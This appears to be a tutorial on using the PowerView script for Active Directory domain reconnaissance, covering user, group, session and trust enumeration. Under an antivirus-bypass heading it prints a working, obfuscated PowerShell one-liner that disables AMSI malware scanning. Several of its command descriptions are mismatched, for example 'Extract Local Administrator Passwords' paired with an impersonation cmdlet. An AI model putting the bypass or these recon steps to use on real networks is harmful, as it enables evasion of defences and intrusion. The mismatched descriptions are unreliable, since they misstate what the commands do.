PowerView is a PowerShell script developed by Will Schroeder and available as part of the PowerSploit framework. It is primarily used for performing domain reconnaissance in Windows environments.
It provides various capabilities to gather information about Active Directory (AD) domains, including user accounts, group memberships, domain controllers, trusts, and more.
Table of Contents
PowerView’s main purpose is to assist in the discovery and enumeration of Active Directory environments.
Here are some of its key features and functionalities:
- User Enumeration: The tool can help you identify users within the domain, including disabled and locked-out accounts. It provides details such as usernames, security identifiers (SIDs), and group memberships.
- Group Enumeration: It allows you to list domain groups, their members, and nested group memberships. This is crucial for understanding the permissions and access control within an Active Directory environment.
- Computer Enumeration: Helps identify computers within the domain, their operating systems, and other relevant information. This is valuable for identifying potential targets for further analysis or exploitation.
- Shares and Permissions: Find shared folders and their associated permissions. This can be helpful in identifying sensitive data and potential security misconfigurations.
- Local Admin Rights: It assists in identifying machines where a specific user has local administrator rights, which can be crucial for lateral movement during penetration testing.
- Session Enumeration: It can enumerate active sessions on domain-joined machines, helping you understand who is currently logged in and what they are doing.
- ACL Enumeration: It allows you to list the permissions associated with objects in the Active Directory, providing insights into potential security vulnerabilities.
Obtain PowerView
Download the PowerSploit framework from the GitHub repository (https://github.com/PowerShellMafia/PowerSploit) or clone the repository using Git.
Launch a PowerShell session
powershellimport the PS module using the following command:
Import-Module <Path to PowerView.ps1>
ByPass Antivirus Detection
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Enumerate Domain Controllers
The PV module provides several commands to gather domain information.
Enumerate all user accounts
This command shows the list of user accounts in the domain. Additional parameters can be used to filter the list based on various criteria.
Get-NetUser
Enumerate all groups in the domain
This command shows the list of groups in the domain.
Additional parameters can be used to filter the list based on various criteria.
Get-NetGroup
Enumerate domain controllers
This command shows the list of domain controllers in the domain.
Get-NetDomainController
Enumerate domain trusts
This will retrieve a list of all domain trusts in the current domain.
To retrieve trust information about a specific domain, you can specify the domain name using the -Domain parameter:
Get-NetDomainTrust
Get-NetDomainTrust is a cmdlet that can be used to retrieve trust relationships between domains within an Active Directory forest.
It provides information about the directionality and type of trust which can be useful for understanding the structure and security of the forest.
Explore User and Group Information
It allows you to query user and group information in detail.
Here are some commands you can use:
Get information about a specific user
Get-NetUser -SamAccountName <username>Get group memberships of a specific user – This command shows the list of members in a specified group.
Get-NetGroupMember -GroupName <groupname>Get information about a specific group – This command shows the list of groups in the domain. Additional parameters can be used to filter the list based on various criteria.
Get-NetGroup -GroupName <groupname>Search for Specific Objects
PowerView offers searching capabilities to find specific objects within the domain.
Search for a specific computer
Find-NetComputer -Ping -HostName <computername>Perform Delegated User Hunting
Identify user accounts with delegated permissions.
Invoke-UserHunterExtract Local Administrator Passwords
Retrieve local administrator passwords stored on domain-joined systems.
This requires administrative privileges or access to the Active Directory database.
Invoke-UserImpersonation -Target <targethostname>These are just a few examples of what PV can do for domain reconnaissance.
Conclusion
In conclusion, PowerView is a powerful tool that can assist in domain enumeration. Properly identifying and securing domain resources is critical to maintaining a secure system and protecting sensitive information.
Offshore is a real-world enterprise environment that features a wide range of modern Active Directory flaws and misconfigurations.
